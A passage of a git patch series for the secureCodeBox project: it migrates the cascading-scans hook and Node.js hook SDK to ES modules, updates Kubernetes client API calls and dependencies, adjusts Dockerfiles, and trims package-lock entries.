"sha512-a4UGQaWPH59mOXUYnAG2ewncQS4i4F43Tv3JoAM+s2VDAmS9NsK8GpDMLrCHPksFT7h3K6TOoUNn2pb7RoXx4g==", - "dev": true - }, - "yargs": { - "version": "17.7.2", - "resolved": "https://registry.npmjs.org/yargs/-/yargs-17.7.2.tgz", - "integrity": "sha512-7dSzzRQ++CKnNI/krKnYRV7JKKPUXMEh61soaHKg9mrWEhzFWhFnxPxGl+69cD1Ou63C13NUPCnmIcrvqCuM6w==", - "dev": true, - "requires": { - "cliui": "^8.0.1", - "escalade": "^3.1.1", - "get-caller-file": "^2.0.5", - "require-directory": "^2.1.1", - "string-width": "^4.2.3", - "y18n": "^5.0.5", - "yargs-parser": "^21.1.1" - } - }, - "yargs-parser": { - "version": "21.1.1", - "resolved": "https://registry.npmjs.org/yargs-parser/-/yargs-parser-21.1.1.tgz", - "integrity": "sha512-tVpsJW7DdjecAiFpbIB1e3qxIQsE6NoPc5/eTdrbbIC4h0LVsWhnoa3g+m2HclBIujHzsxZ4VJVA+GUuc2/LBw==", - "dev": true - }, - "yocto-queue": { - "version": "0.1.0", - "resolved": "https://registry.npmjs.org/yocto-queue/-/yocto-queue-0.1.0.tgz", - "integrity": "sha512-rVksvsnNCdJ/ohGc6xgPwyN8eheCxsiLM8mxuE/t/mOVqJewPuO1miLpTHQiRgTKCLexL4MeAFVagts7HmNZ2Q==", - "dev": true } } } diff --git a/hooks/cascading-scans/hook/package.json b/hooks/cascading-scans/hook/package.json index fc7b5e09da..d7573ba061 100644 --- a/hooks/cascading-scans/hook/package.json +++ b/hooks/cascading-scans/hook/package.json @@ -9,9 +9,8 @@ }, "main": "hook.js", "scripts": { - "build": "npx tsc hook.ts --sourceMap --esModuleInterop", - "test:unit": "jest --verbose --testPathIgnorePatterns /integration-tests/ --ci --colors --coverage --passWithNoTests", - "test:integration": "jest --verbose --ci --colors --coverage --passWithNoTests" + "lint": "npx tsc hook.ts --noEmit --skipLibCheck", + "build": "esbuild --platform=node --target=node22 --format=esm --outdir=./build/ --sourcemap *.ts" }, "keywords": [ "secureCodeBox", @@ -38,18 +37,20 @@ }, "license": "Apache-2.0", "dependencies": { - "@kubernetes/client-node": "^0.19.0", - "ip-address": "^8.1.0", + "@kubernetes/client-node": "^1.3.0", + "ip-address": "^10.0.1", "lodash": "^4.17.21", - "matcher": "^4.0.0", + "matcher": "^5.0.0", "mustache": "^4.2.0", - "parse-domain": "^4.1.0" + "parse-domain": "^8.2.2" }, "devDependencies": { "@types/ip-address": "^7.0.0", "@types/lodash": "^4.14.171", + "@types/matcher": "^1.1.0", "@types/mustache": "^4.2.6", - "@types/node": "^16.0.0", - "typescript": "^4.3.5" + "@types/node": "^22.16.0", + "esbuild": "^0.25.5", + "typescript": "^5.8.3" } } \ No newline at end of file diff --git a/hooks/cascading-scans/hook/scan-helpers.ts b/hooks/cascading-scans/hook/scan-helpers.ts index d90d960af3..ad94e62c2a 100644 --- a/hooks/cascading-scans/hook/scan-helpers.ts +++ b/hooks/cascading-scans/hook/scan-helpers.ts @@ -2,8 +2,6 @@ // // SPDX-License-Identifier: Apache-2.0 -import * as k8s from "@kubernetes/client-node"; - import { generateSelectorString, LabelSelector, @@ -11,12 +9,22 @@ import { import { isEqual } from "lodash"; import { getScanChain } from "./hook"; import { ScopeLimiterRequirement } from "./scope-limiter"; +import { + CustomObjectsApi, + KubeConfig, + V1Container, + V1EnvVar, + V1Toleration, + V1Volume, + V1VolumeMount, + type V1ObjectMeta, +} from "@kubernetes/client-node"; // configure k8s client -const kc = new k8s.KubeConfig(); +const kc = new KubeConfig(); kc.loadFromDefault(); -const k8sApiCRD = kc.makeApiClient(k8s.CustomObjectsApi); +const k8sApiCRD = kc.makeApiClient(CustomObjectsApi); const namespace = process.env["NAMESPACE"]; @@ -31,7 +39,7 @@ export interface Finding { } export interface CascadingRule { - metadata: k8s.V1ObjectMeta; + metadata: V1ObjectMeta; spec: CascadingRuleSpec; } @@ -51,7 +59,7 @@ export interface Matches { } export interface Scan { - metadata: k8s.V1ObjectMeta; + metadata: V1ObjectMeta; spec: ScanSpec; status?: ScanStatus; } @@ -60,13 +68,13 @@ export interface ScanSpec { scanType: string; parameters: Array; cascades: LabelSelector & CascadingInheritance; - env?: Array; - volumes?: Array; - volumeMounts?: Array; - initContainers?: Array; + env?: Array; + volumes?: Array; + volumeMounts?: Array; + initContainers?: Array; hookSelector?: LabelSelector; - tolerations?: Array; - affinity?: k8s.V1Toleration; + tolerations?: Array; + affinity?: V1Toleration; resourceMode: "clusterWide" | "namespaceLocal"; } @@ -94,7 +102,7 @@ export interface ScanStatus { } export interface ParseDefinition { - metadata: k8s.V1ObjectMeta; + metadata: V1ObjectMeta; spec: ParseDefinitionSpec; } @@ -160,15 +168,14 @@ export async function startSubsequentSecureCodeBoxScan(scan: Scan) { try { // Submitting the Scan to the kubernetes api - const createdScan = await k8sApiCRD.createNamespacedCustomObject( - "execution.securecodebox.io", - "v1", - namespace, - "scans", - scan, - "false", - ); - console.log(`-> Created scan ${createdScan.body["metadata"].name}`); + const createdScan = await k8sApiCRD.createNamespacedCustomObject({ + version: "v1", + group: "execution.securecodebox.io", + plural: "scans", + namespace: namespace, + body: scan, + }); + console.log(`-> Created scan ${createdScan.metadata.name}`); } catch (error) { console.error(`Failed to start Scan ${scan.metadata.generateName}`); console.error(error); @@ -188,17 +195,13 @@ export async function getCascadingRulesForScan(scan: Scan) { `Fetching CascadingScans using LabelSelector: "${labelSelector}"`, ); - const response: any = await k8sApiCRD.listNamespacedCustomObject( - "cascading.securecodebox.io", - "v1", - namespace, - "cascadingrules", - undefined, - undefined, - undefined, - undefined, - labelSelector, - ); + const response: any = await k8sApiCRD.listNamespacedCustomObject({ + group: "cascading.securecodebox.io", + version: "v1", + namespace: namespace, + plural: "cascadingrules", + labelSelector: labelSelector, + }); console.log(`Fetched ${response.body.items.length} CascadingRules`); return response.body.items; @@ -211,15 +214,17 @@ export async function getCascadingRulesForScan(scan: Scan) { export async function getParseDefinitionForScan(scan: Scan) { try { - const response: any = await k8sApiCRD.getNamespacedCustomObject( - "execution.securecodebox.io", - "v1", - namespace, - "parsedefinitions", - scan.status.rawResultType, + const response: ParseDefinition = await k8sApiCRD.getNamespacedCustomObject( + { + group: "execution.securecodebox.io", + version: "v1", + namespace: namespace, + plural: "parsedefinitions", + name: scan.status.rawResultType, + }, ); - return response.body; + return response; } catch (err) { console.error( `Failed to get ParseDefinition ${scan.status.rawResultType} from the kubernetes api`, @@ -316,18 +321,18 @@ export async function getCascadedRuleForScan(scan: Scan) { async function getCascadingRule(ruleName) { try { - const response: any = await k8sApiCRD.getNamespacedCustomObject( - "cascading.securecodebox.io", - "v1", - namespace, - "cascadingrules", - ruleName, - ); + const response: CascadingRule = await k8sApiCRD.getNamespacedCustomObject({ + group: "cascading.securecodebox.io", + version: "v1", + namespace: namespace, + plural: "cascadingrules", + name: ruleName, + }); console.log( `Fetched CascadingRule "${ruleName}" that triggered parent scan`, ); - return response.body; + return response; } catch (err) { console.error( `Failed to get CascadingRule "${ruleName}" from the kubernetes api`, diff --git a/hooks/cascading-scans/hook/scope-limiter.ts b/hooks/cascading-scans/hook/scope-limiter.ts index ac45b3932c..267034edbd 100644 --- a/hooks/cascading-scans/hook/scope-limiter.ts +++ b/hooks/cascading-scans/hook/scope-limiter.ts @@ -4,7 +4,7 @@ import { Finding, ScopeLimiter, ScopeLimiterAliases } from "./scan-helpers"; import { V1ObjectMeta } from "@kubernetes/client-node/dist/gen/model/v1ObjectMeta"; -import Mustache from "mustache"; +import Mustache from "mustache/mustache.mjs"; import { Address4, Address6 } from "ip-address"; import { fromUrl, parseDomain, ParseResultType } from "parse-domain"; import { flatten, isEqual, takeRight } from "lodash"; diff --git a/hooks/cascading-scans/hook/tsconfig.json b/hooks/cascading-scans/hook/tsconfig.json new file mode 100644 index 0000000000..3ac06d1ff5 --- /dev/null +++ b/hooks/cascading-scans/hook/tsconfig.json @@ -0,0 +1,16 @@ +{ + "compilerOptions": { + "target": "ES2022", + "module": "nodenext", + "outDir": "dist", + "rootDir": ".", + "esModuleInterop": false, + "forceConsistentCasingInFileNames": true, + "skipLibCheck": true, + "allowJs": true, + "noEmitOnError": false, + "strict": false + }, + "include": ["**/*.ts"], + "exclude": ["node_modules", "dist"] +} diff --git a/hooks/cascading-scans/hook/tsconfig.json.license b/hooks/cascading-scans/hook/tsconfig.json.license new file mode 100644 index 0000000000..c95bc37185 --- /dev/null +++ b/hooks/cascading-scans/hook/tsconfig.json.license @@ -0,0 +1,3 @@ +SPDX-FileCopyrightText: the secureCodeBox authors + +SPDX-License-Identifier: Apache-2.0 From d8260b6075eddff8703317bb99944dd35c6d24bd Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Mon, 7 Jul 2025 19:14:41 +0200 Subject: [PATCH 087/137] Include .js extension for better nodejs module support --- hooks/cascading-scans/hook/hook.ts | 4 ++-- hooks/cascading-scans/hook/scan-helpers.ts | 13 +++++++------ hooks/cascading-scans/hook/scope-limiter.ts | 3 ++- 3 files changed, 11 insertions(+), 9 deletions(-) diff --git a/hooks/cascading-scans/hook/hook.ts b/hooks/cascading-scans/hook/hook.ts index c183ca06f4..545f5deeb8 100644 --- a/hooks/cascading-scans/hook/hook.ts +++ b/hooks/cascading-scans/hook/hook.ts @@ -29,8 +29,8 @@ import { mergeInheritedMap, mergeInheritedArray, mergeInheritedSelector, -} from "./scan-helpers"; -import { isInScope, scopeDomain } from "./scope-limiter"; +} from "./scan-helpers.js"; +import { isInScope, scopeDomain } from "./scope-limiter.js"; interface HandleArgs { scan: Scan; diff --git a/hooks/cascading-scans/hook/scan-helpers.ts b/hooks/cascading-scans/hook/scan-helpers.ts index ad94e62c2a..c5b72a2a9c 100644 --- a/hooks/cascading-scans/hook/scan-helpers.ts +++ b/hooks/cascading-scans/hook/scan-helpers.ts @@ -2,13 +2,7 @@ // // SPDX-License-Identifier: Apache-2.0 -import { - generateSelectorString, - LabelSelector, -} from "./kubernetes-label-selector"; import { isEqual } from "lodash"; -import { getScanChain } from "./hook"; -import { ScopeLimiterRequirement } from "./scope-limiter"; import { CustomObjectsApi, KubeConfig, @@ -20,6 +14,13 @@ import { type V1ObjectMeta, } from "@kubernetes/client-node"; +import { getScanChain } from "./hook.js"; +import { ScopeLimiterRequirement } from "./scope-limiter.js"; +import { + generateSelectorString, + LabelSelector, +} from "./kubernetes-label-selector.js"; + // configure k8s client const kc = new KubeConfig(); kc.loadFromDefault(); diff --git a/hooks/cascading-scans/hook/scope-limiter.ts b/hooks/cascading-scans/hook/scope-limiter.ts index 267034edbd..f376061153 100644 --- a/hooks/cascading-scans/hook/scope-limiter.ts +++ b/hooks/cascading-scans/hook/scope-limiter.ts @@ -2,13 +2,14 @@ // // SPDX-License-Identifier: Apache-2.0 -import { Finding, ScopeLimiter, ScopeLimiterAliases } from "./scan-helpers"; import { V1ObjectMeta } from "@kubernetes/client-node/dist/gen/model/v1ObjectMeta"; import Mustache from "mustache/mustache.mjs"; import { Address4, Address6 } from "ip-address"; import { fromUrl, parseDomain, ParseResultType } from "parse-domain"; import { flatten, isEqual, takeRight } from "lodash"; +import { Finding, ScopeLimiter, ScopeLimiterAliases } from "./scan-helpers.js"; + export enum ScopeLimiterRequirementOperator { In = "In", NotIn = "NotIn", From d5e5549866626fd3cef5d0f50c9aea5a757b3d99 Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Mon, 7 Jul 2025 19:18:05 +0200 Subject: [PATCH 088/137] Mark hook-sdk as module --- hook-sdk/nodejs/package.json | 1 + 1 file changed, 1 insertion(+) diff --git a/hook-sdk/nodejs/package.json b/hook-sdk/nodejs/package.json index dfbb37b832..c25304386e 100644 --- a/hook-sdk/nodejs/package.json +++ b/hook-sdk/nodejs/package.json @@ -1,6 +1,7 @@ { "name": "@securecodebox/hook-sdk-nodejs", "version": "1.0.0", + "type": "module", "description": "Handles external communication required for all secureCodeBox Hooks", "main": "hook-wrapper.js", "scripts": {}, From f2189aca2df274c41be39f1174407b3df0008932 Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Mon, 7 Jul 2025 19:20:19 +0200 Subject: [PATCH 089/137] Include package json in docker file --- hook-sdk/nodejs/Dockerfile | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/hook-sdk/nodejs/Dockerfile b/hook-sdk/nodejs/Dockerfile index 270e9b83fc..8bdfe87495 100644 --- a/hook-sdk/nodejs/Dockerfile +++ b/hook-sdk/nodejs/Dockerfile @@ -12,7 +12,7 @@ ARG NODE_ENV RUN addgroup --system --gid 1001 app && adduser app --system --uid 1001 --ingroup app WORKDIR /home/app/hook-wrapper/ COPY --from=build --chown=root:root --chmod=755 /home/app/node_modules/ ./node_modules/ -COPY --chown=root:root --chmod=755 ./hook-wrapper.js ./hook-wrapper.js +COPY --chown=root:root --chmod=755 ./hook-wrapper.js ./package.json ./package-lock.json ./ USER 1001 ENV NODE_ENV=${NODE_ENV:-production} ENTRYPOINT ["node", "/home/app/hook-wrapper/hook-wrapper.js"] From 3d80b4475591547fe5349cfbca8c054c7a40c169 Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Mon, 7 Jul 2025 19:29:42 +0200 Subject: [PATCH 090/137] Minor changes to align hook and hook-sdk code more --- hook-sdk/nodejs/hook-wrapper.js | 12 ++++---- hooks/cascading-scans/hook/package.json | 1 + hooks/cascading-scans/hook/scan-helpers.ts | 35 ++++++++++------------ 3 files changed, 23 insertions(+), 25 deletions(-) diff --git a/hook-sdk/nodejs/hook-wrapper.js b/hook-sdk/nodejs/hook-wrapper.js index a7eddc22f0..b7a8c0412f 100644 --- a/hook-sdk/nodejs/hook-wrapper.js +++ b/hook-sdk/nodejs/hook-wrapper.js @@ -5,21 +5,19 @@ import { KubeConfig, CustomObjectsApi, + setHeaderOptions, PatchStrategy, } from "@kubernetes/client-node"; import { handle } from "./hook/hook.js"; -const scanName = process.env["SCAN_NAME"]; -const namespace = process.env["NAMESPACE"]; - -console.log(`Starting hook for Scan "${scanName}"`); - const kc = new KubeConfig(); kc.loadFromCluster(); - const k8sApi = kc.makeApiClient(CustomObjectsApi); +const scanName = process.env["SCAN_NAME"]; +const namespace = process.env["NAMESPACE"]; + function downloadFile(url) { return fetch(url); } @@ -143,6 +141,8 @@ async function updateFindings(findings) { } async function main() { + console.log(`Starting hook for Scan "${scanName}"`); + let scan; try { scan = await k8sApi.getNamespacedCustomObject({ diff --git a/hooks/cascading-scans/hook/package.json b/hooks/cascading-scans/hook/package.json index d7573ba061..8f0e5576a4 100644 --- a/hooks/cascading-scans/hook/package.json +++ b/hooks/cascading-scans/hook/package.json @@ -1,6 +1,7 @@ { "name": "@securecodebox/hook-cascading-scans", "version": "1.0.0", + "type": "module", "description": "secureCodeBox Hook to cascade scan in an declarative manner.", "homepage": "https://www.secureCodeBox.io", "repository": { diff --git a/hooks/cascading-scans/hook/scan-helpers.ts b/hooks/cascading-scans/hook/scan-helpers.ts index c5b72a2a9c..86614a7394 100644 --- a/hooks/cascading-scans/hook/scan-helpers.ts +++ b/hooks/cascading-scans/hook/scan-helpers.ts @@ -6,11 +6,11 @@ import { isEqual } from "lodash"; import { CustomObjectsApi, KubeConfig, - V1Container, - V1EnvVar, - V1Toleration, - V1Volume, - V1VolumeMount, + type V1Container, + type V1EnvVar, + type V1Toleration, + type V1Volume, + type V1VolumeMount, type V1ObjectMeta, } from "@kubernetes/client-node"; @@ -24,8 +24,7 @@ import { // configure k8s client const kc = new KubeConfig(); kc.loadFromDefault(); - -const k8sApiCRD = kc.makeApiClient(CustomObjectsApi); +const k8sApi = kc.makeApiClient(CustomObjectsApi); const namespace = process.env["NAMESPACE"]; @@ -169,7 +168,7 @@ export async function startSubsequentSecureCodeBoxScan(scan: Scan) { try { // Submitting the Scan to the kubernetes api - const createdScan = await k8sApiCRD.createNamespacedCustomObject({ + const createdScan = await k8sApi.createNamespacedCustomObject({ version: "v1", group: "execution.securecodebox.io", plural: "scans", @@ -196,7 +195,7 @@ export async function getCascadingRulesForScan(scan: Scan) { `Fetching CascadingScans using LabelSelector: "${labelSelector}"`, ); - const response: any = await k8sApiCRD.listNamespacedCustomObject({ + const response: any = await k8sApi.listNamespacedCustomObject({ group: "cascading.securecodebox.io", version: "v1", namespace: namespace, @@ -215,15 +214,13 @@ export async function getCascadingRulesForScan(scan: Scan) { export async function getParseDefinitionForScan(scan: Scan) { try { - const response: ParseDefinition = await k8sApiCRD.getNamespacedCustomObject( - { - group: "execution.securecodebox.io", - version: "v1", - namespace: namespace, - plural: "parsedefinitions", - name: scan.status.rawResultType, - }, - ); + const response: ParseDefinition = await k8sApi.getNamespacedCustomObject({ + group: "execution.securecodebox.io", + version: "v1", + namespace: namespace, + plural: "parsedefinitions", + name: scan.status.rawResultType, + }); return response; } catch (err) { @@ -322,7 +319,7 @@ export async function getCascadedRuleForScan(scan: Scan) { async function getCascadingRule(ruleName) { try { - const response: CascadingRule = await k8sApiCRD.getNamespacedCustomObject({ + const response: CascadingRule = await k8sApi.getNamespacedCustomObject({ group: "cascading.securecodebox.io", version: "v1", namespace: namespace, From ddaafcf9b5874d0dc8efdb25a0d66bffd68d43c5 Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Mon, 7 Jul 2025 19:35:13 +0200 Subject: [PATCH 091/137] Fix type import --- hooks/cascading-scans/hook/scope-limiter.ts | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/hooks/cascading-scans/hook/scope-limiter.ts b/hooks/cascading-scans/hook/scope-limiter.ts index f376061153..933b6b9cc4 100644 --- a/hooks/cascading-scans/hook/scope-limiter.ts +++ b/hooks/cascading-scans/hook/scope-limiter.ts @@ -2,7 +2,7 @@ // // SPDX-License-Identifier: Apache-2.0 -import { V1ObjectMeta } from "@kubernetes/client-node/dist/gen/model/v1ObjectMeta"; +import { type V1ObjectMeta } from "@kubernetes/client-node"; import Mustache from "mustache/mustache.mjs"; import { Address4, Address6 } from "ip-address"; import { fromUrl, parseDomain, ParseResultType } from "parse-domain"; From ff4f55e2c9ae3cde9846116168ccc621d21570ad Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Mon, 7 Jul 2025 19:47:34 +0200 Subject: [PATCH 092/137] Align context setup methods --- hooks/cascading-scans/hook/scan-helpers.ts | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/hooks/cascading-scans/hook/scan-helpers.ts b/hooks/cascading-scans/hook/scan-helpers.ts index 86614a7394..af9487c0ad 100644 --- a/hooks/cascading-scans/hook/scan-helpers.ts +++ b/hooks/cascading-scans/hook/scan-helpers.ts @@ -23,7 +23,7 @@ import { // configure k8s client const kc = new KubeConfig(); -kc.loadFromDefault(); +kc.loadFromCluster(); const k8sApi = kc.makeApiClient(CustomObjectsApi); const namespace = process.env["NAMESPACE"]; From a491bd52bee0abcbb752fa5e6f6387d8860be95b Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Mon, 7 Jul 2025 19:55:30 +0200 Subject: [PATCH 093/137] Split type and non type imports --- hooks/cascading-scans/hook/scan-helpers.ts | 17 ++++++++--------- 1 file changed, 8 insertions(+), 9 deletions(-) diff --git a/hooks/cascading-scans/hook/scan-helpers.ts b/hooks/cascading-scans/hook/scan-helpers.ts index af9487c0ad..2756a7a41e 100644 --- a/hooks/cascading-scans/hook/scan-helpers.ts +++ b/hooks/cascading-scans/hook/scan-helpers.ts @@ -3,15 +3,14 @@ // SPDX-License-Identifier: Apache-2.0 import { isEqual } from "lodash"; -import { - CustomObjectsApi, - KubeConfig, - type V1Container, - type V1EnvVar, - type V1Toleration, - type V1Volume, - type V1VolumeMount, - type V1ObjectMeta, +import { CustomObjectsApi, KubeConfig } from "@kubernetes/client-node"; +import type { + V1Container, + V1EnvVar, + V1Toleration, + V1Volume, + V1VolumeMount, + V1ObjectMeta, } from "@kubernetes/client-node"; import { getScanChain } from "./hook.js"; From d738567650e6de657a3fe1ed975d7a2197b86253 Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Mon, 7 Jul 2025 20:21:29 +0200 Subject: [PATCH 094/137] Include package json --- hooks/cascading-scans/hook/Dockerfile | 2 ++ 1 file changed, 2 insertions(+) diff --git a/hooks/cascading-scans/hook/Dockerfile b/hooks/cascading-scans/hook/Dockerfile index 3a1d8d965e..a941c67eed 100644 --- a/hooks/cascading-scans/hook/Dockerfile +++ b/hooks/cascading-scans/hook/Dockerfile @@ -20,5 +20,7 @@ RUN npm run build FROM ${namespace:-securecodebox}/hook-sdk-nodejs:${baseImageTag:-latest} WORKDIR /home/app/hook-wrapper/hook/ +COPY --chown=root:root --chmod=755 package.json package-lock.json ./ COPY --from=install --chown=root:root --chmod=755 /home/app/node_modules/ ./node_modules/ COPY --from=build --chown=root:root --chmod=755 /home/app/build/ ./ + From 1dc425a5a695af28b2b8ffff8e311be4a3651e93 Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Mon, 7 Jul 2025 20:34:23 +0200 Subject: [PATCH 095/137] Switch to lodash-es --- hook-sdk/nodejs/package-lock.json | 509 +---------- hooks/cascading-scans/hook/hook.ts | 2 +- hooks/cascading-scans/hook/package-lock.json | 854 +------------------ hooks/cascading-scans/hook/package.json | 2 +- hooks/cascading-scans/hook/scan-helpers.ts | 2 +- hooks/cascading-scans/hook/scope-limiter.ts | 2 +- 6 files changed, 11 insertions(+), 1360 deletions(-) diff --git a/hook-sdk/nodejs/package-lock.json b/hook-sdk/nodejs/package-lock.json index eafac987e2..1dcba7c7f5 100644 --- a/hook-sdk/nodejs/package-lock.json +++ b/hook-sdk/nodejs/package-lock.json @@ -1,7 +1,7 @@ { "name": "@securecodebox/hook-sdk-nodejs", "version": "1.0.0", - "lockfileVersion": 2, + "lockfileVersion": 3, "requires": true, "packages": { "": { @@ -761,512 +761,5 @@ } } } - }, - "dependencies": { - "@jsep-plugin/assignment": { - "version": "1.3.0", - "resolved": "https://registry.npmjs.org/@jsep-plugin/assignment/-/assignment-1.3.0.tgz", - "integrity": "sha512-VVgV+CXrhbMI3aSusQyclHkenWSAm95WaiKrMxRFam3JSUiIaQjoMIw2sEs/OX4XifnqeQUN4DYbJjlA8EfktQ==", - "requires": {} - }, - "@jsep-plugin/regex": { - "version": "1.0.4", - "resolved": "https://registry.npmjs.org/@jsep-plugin/regex/-/regex-1.0.4.tgz", - "integrity": "sha512-q7qL4Mgjs1vByCaTnDFcBnV9HS7GVPJX5vyVoCgZHNSC9rjwIlmbXG5sUuorR5ndfHAIlJ8pVStxvjXHbNvtUg==", - "requires": {} - }, - "@kubernetes/client-node": { - "version": "1.3.0", - "resolved": "https://registry.npmjs.org/@kubernetes/client-node/-/client-node-1.3.0.tgz", - "integrity": "sha512-IE0yrIpOT97YS5fg2QpzmPzm8Wmcdf4ueWMn+FiJSI3jgTTQT1u+LUhoYpdfhdHAVxdrNsaBg2C0UXSnOgMoCQ==", - "requires": { - "@types/js-yaml": "^4.0.1", - "@types/node": "^22.0.0", - "@types/node-fetch": "^2.6.9", - "@types/stream-buffers": "^3.0.3", - "form-data": "^4.0.0", - "hpagent": "^1.2.0", - "isomorphic-ws": "^5.0.0", - "js-yaml": "^4.1.0", - "jsonpath-plus": "^10.3.0", - "node-fetch": "^2.6.9", - "openid-client": "^6.1.3", - "rfc4648": "^1.3.0", - "socks-proxy-agent": "^8.0.4", - "stream-buffers": "^3.0.2", - "tar-fs": "^3.0.8", - "ws": "^8.18.2" - } - }, - "@types/js-yaml": { - "version": "4.0.9", - "resolved": "https://registry.npmjs.org/@types/js-yaml/-/js-yaml-4.0.9.tgz", - "integrity": "sha512-k4MGaQl5TGo/iipqb2UDG2UwjXziSWkh0uysQelTlJpX1qGlpUZYm8PnO4DxG1qBomtJUdYJ6qR6xdIah10JLg==" - }, - "@types/node": { - "version": "22.16.0", - "resolved": "https://registry.npmjs.org/@types/node/-/node-22.16.0.tgz", - "integrity": "sha512-B2egV9wALML1JCpv3VQoQ+yesQKAmNMBIAY7OteVrikcOcAkWm+dGL6qpeCktPjAv6N1JLnhbNiqS35UpFyBsQ==", - "requires": { - "undici-types": "~6.21.0" - } - }, - "@types/node-fetch": { - "version": "2.6.12", - "resolved": "https://registry.npmjs.org/@types/node-fetch/-/node-fetch-2.6.12.tgz", - "integrity": "sha512-8nneRWKCg3rMtF69nLQJnOYUcbafYeFSjqkw3jCRLsqkWFlHaoQrr5mXmofFGOx3DKn7UfmBMyov8ySvLRVldA==", - "requires": { - "@types/node": "*", - "form-data": "^4.0.0" - } - }, - "@types/stream-buffers": { - "version": "3.0.7", - "resolved": "https://registry.npmjs.org/@types/stream-buffers/-/stream-buffers-3.0.7.tgz", - "integrity": "sha512-azOCy05sXVXrO+qklf0c/B07H/oHaIuDDAiHPVwlk3A9Ek+ksHyTeMajLZl3r76FxpPpxem//4Te61G1iW3Giw==", - "requires": { - "@types/node": "*" - } - }, - "agent-base": { - "version": "7.1.3", - "resolved": "https://registry.npmjs.org/agent-base/-/agent-base-7.1.3.tgz", - "integrity": "sha512-jRR5wdylq8CkOe6hei19GGZnxM6rBGwFl3Bg0YItGDimvjGtAvdZk4Pu6Cl4u4Igsws4a1fd1Vq3ezrhn4KmFw==" - }, - "argparse": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/argparse/-/argparse-2.0.1.tgz", - "integrity": "sha512-8+9WqebbFzpX9OR+Wa6O29asIogeRMzcGtAINdpMHHyAg10f05aSFVBbcEqGf/PXw1EjAZ+q2/bEBg3DvurK3Q==" - }, - "asynckit": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/asynckit/-/asynckit-0.4.0.tgz", - "integrity": "sha1-x57Zf380y48robyXkLzDZkdLS3k=" - }, - "b4a": { - "version": "1.6.7", - "resolved": "https://registry.npmjs.org/b4a/-/b4a-1.6.7.tgz", - "integrity": "sha512-OnAYlL5b7LEkALw87fUVafQw5rVR9RjwGd4KUwNQ6DrrNmaVaUCgLipfVlzrPQ4tWOR9P0IXGNOx50jYCCdSJg==" - }, - "bare-events": { - "version": "2.5.4", - "resolved": "https://registry.npmjs.org/bare-events/-/bare-events-2.5.4.tgz", - "integrity": "sha512-+gFfDkR8pj4/TrWCGUGWmJIkBwuxPS5F+a5yWjOHQt2hHvNZd5YLzadjmDUtFmMM4y429bnKLa8bYBMHcYdnQA==", - "optional": true - }, - "bare-fs": { - "version": "4.1.6", - "resolved": "https://registry.npmjs.org/bare-fs/-/bare-fs-4.1.6.tgz", - "integrity": "sha512-25RsLF33BqooOEFNdMcEhMpJy8EoR88zSMrnOQOaM3USnOK2VmaJ1uaQEwPA6AQjrv1lXChScosN6CzbwbO9OQ==", - "optional": true, - "requires": { - "bare-events": "^2.5.4", - "bare-path": "^3.0.0", - "bare-stream": "^2.6.4" - } - }, - "bare-os": { - "version": "3.6.1", - "resolved": "https://registry.npmjs.org/bare-os/-/bare-os-3.6.1.tgz", - "integrity": "sha512-uaIjxokhFidJP+bmmvKSgiMzj2sV5GPHaZVAIktcxcpCyBFFWO+YlikVAdhmUo2vYFvFhOXIAlldqV29L8126g==", - "optional": true - }, - "bare-path": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/bare-path/-/bare-path-3.0.0.tgz", - "integrity": "sha512-tyfW2cQcB5NN8Saijrhqn0Zh7AnFNsnczRcuWODH0eYAXBsJ5gVxAUuNr7tsHSC6IZ77cA0SitzT+s47kot8Mw==", - "optional": true, - "requires": { - "bare-os": "^3.0.1" - } - }, - "bare-stream": { - "version": "2.6.5", - "resolved": "https://registry.npmjs.org/bare-stream/-/bare-stream-2.6.5.tgz", - "integrity": "sha512-jSmxKJNJmHySi6hC42zlZnq00rga4jjxcgNZjY9N5WlOe/iOoGRtdwGsHzQv2RlH2KOYMwGUXhf2zXd32BA9RA==", - "optional": true, - "requires": { - "streamx": "^2.21.0" - } - }, - "call-bind-apply-helpers": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/call-bind-apply-helpers/-/call-bind-apply-helpers-1.0.2.tgz", - "integrity": "sha512-Sp1ablJ0ivDkSzjcaJdxEunN5/XvksFJ2sMBFfq6x0ryhQV/2b/KwFe21cMpmHtPOSij8K99/wSfoEuTObmuMQ==", - "requires": { - "es-errors": "^1.3.0", - "function-bind": "^1.1.2" - } - }, - "combined-stream": { - "version": "1.0.8", - "resolved": "https://registry.npmjs.org/combined-stream/-/combined-stream-1.0.8.tgz", - "integrity": "sha512-FQN4MRfuJeHf7cBbBMJFXhKSDq+2kAArBlmRBvcvFE5BB1HZKXtSFASDhdlz9zOYwxh8lDdnvmMOe/+5cdoEdg==", - "requires": { - "delayed-stream": "~1.0.0" - } - }, - "debug": { - "version": "4.4.1", - "resolved": "https://registry.npmjs.org/debug/-/debug-4.4.1.tgz", - "integrity": "sha512-KcKCqiftBJcZr++7ykoDIEwSa3XWowTfNPo92BYxjXiyYEVrUQh2aLyhxBCwww+heortUFxEJYcRzosstTEBYQ==", - "requires": { - "ms": "^2.1.3" - } - }, - "delayed-stream": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/delayed-stream/-/delayed-stream-1.0.0.tgz", - "integrity": "sha1-3zrhmayt+31ECqrgsp4icrJOxhk=" - }, - "dunder-proto": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/dunder-proto/-/dunder-proto-1.0.1.tgz", - "integrity": "sha512-KIN/nDJBQRcXw0MLVhZE9iQHmG68qAVIBg9CqmUYjmQIhgij9U5MFvrqkUL5FbtyyzZuOeOt0zdeRe4UY7ct+A==", - "requires": { - "call-bind-apply-helpers": "^1.0.1", - "es-errors": "^1.3.0", - "gopd": 